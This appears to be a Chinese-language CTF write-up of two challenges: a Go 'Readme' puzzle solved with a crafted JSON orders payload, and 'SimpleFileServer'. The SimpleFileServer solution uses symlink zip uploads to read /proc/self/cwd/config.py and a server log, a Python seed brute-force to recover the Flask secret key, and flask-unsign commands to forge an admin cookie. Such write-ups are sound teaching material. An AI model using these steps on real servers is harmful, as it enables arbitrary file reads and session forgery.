Readme

首先 []byte 是 go 语言里面的一个索引，比如：

package mainimport "fmt"func main() {var str string = "hello"var randomData []byte = []byte(str)fmt.Println(randomData[0:])	//[104 101 108 108 111]
}

上面这串代码会从下标从 0 开始一直到最后的字符串转换为十进制数输出。

我们看一下源码，开头的几段告诉我们设置了一个哈希密码，然后把这个密码复制到 randomData 数组的 12625 位置后面。

接着设置了一个结构体，json 形式，属性名 是 Orders，Orders 是一个整数数组，从 randomData 中提取指定数量的数据，按顺序检索完成后，检索32个字节，如果与密码哈希匹配，则会得到一个标志，也就是说，如果能够按顺序提取12625 字节就好了，但由于数量限制（最大 10），这是不可能的。

这边有位大佬说：

由于 randomData 有一个固定的种子，所以总是出现相同的字节串来检查缓冲区的查找进度。
{“orders”:[100,1]}如果你这样尝试，101 字节的寻道应该前进，但它前进了 4097 字节。（不知道为啥）


{“orders”:[100,100,1]} 然后前进8193字节。 所以如果指定 100，可以前进 4096 个字节。 我们要前进
12625 个字节，所以 4096 3=12288 还剩 337 个字节。99 3=297 还剩下 40 个字节。

最后就是：

{"orders":[100,100,100,99,99,99,40]}

SimpleFileServer

知识点：软连接（symlink），伪目录（proc），cookie 伪造，时间戳（时区不同）

下载源码，审计后可以发现重要的就是几个地方。

flag 需要 admin 权限。

我们可以伪造 admin 的 cookie 来登录获取 flag，在 app.py 中可以看到密钥在环境变量里面。

在 config.py 中可以看出密钥的生成，它还提示我们 SECRET_OFFSET 是编辑后的，那么我们还要找一下真正的 config.py。

在 app.py 中可以发现它接收一个压缩包并直接解压，没有任何处理，那么我们是不是可以通过软连接的形式来读取文件，那么目录是什么呢？可以通过 /proc（虚拟文件系统）来读取真正的 config.py。

两条命令，然后把生成的 zip 上传上去并且访问 /uploads/ID/succ 就可以得到真正的文件了。

ln -s /proc/self/cwd/config.py succ
zip --symlinks succ.zip succ

但密钥的构造里面还有一个未知的就是服务其的启动时间，这个我们可以读日志，Dockerfile 里面也告诉了我们日志的位置。

同样的两条命令。

ln -s /tmp/server.log succ
zip --symlinks succ.zip succ

得到时间，我们在把它转换成时间戳的格式，但是这边有个坑，这是英国的时间，不是中国的所以要在其基础上加八个小时，最后再转换成时间戳。

如下：

前后 1 秒钟之间的所有时间戳列出来，拿我们注册的 cookie 验证一个哪个正确。

import random
import os
import timefor d in range(-1000,1000):random.seed((1673910802 - 67198624) *1000 + d)print("".join([hex(random.randint(0, 15)) for x in range(32)]).replace("0x", ""))

flask-unsign -c "eyJhZG1pbiI6ZmFsc2UsInVpZCI6InN1Y2MifQ.Y8YgQg.ylUP0n8MGFt8TSh3pOYGw6cDRIE" --unsign --wordlist test.txt --no-literal-eval

得到 key 我们就可以伪造 admin 了。

flask-unsign --sign --secret 074cce10940b886e3089f27a878577cd --cookie "{'admin': True, 'uid': 'succ'}" 

最后拿上伪造的 cookie 访问 flag 就可以了。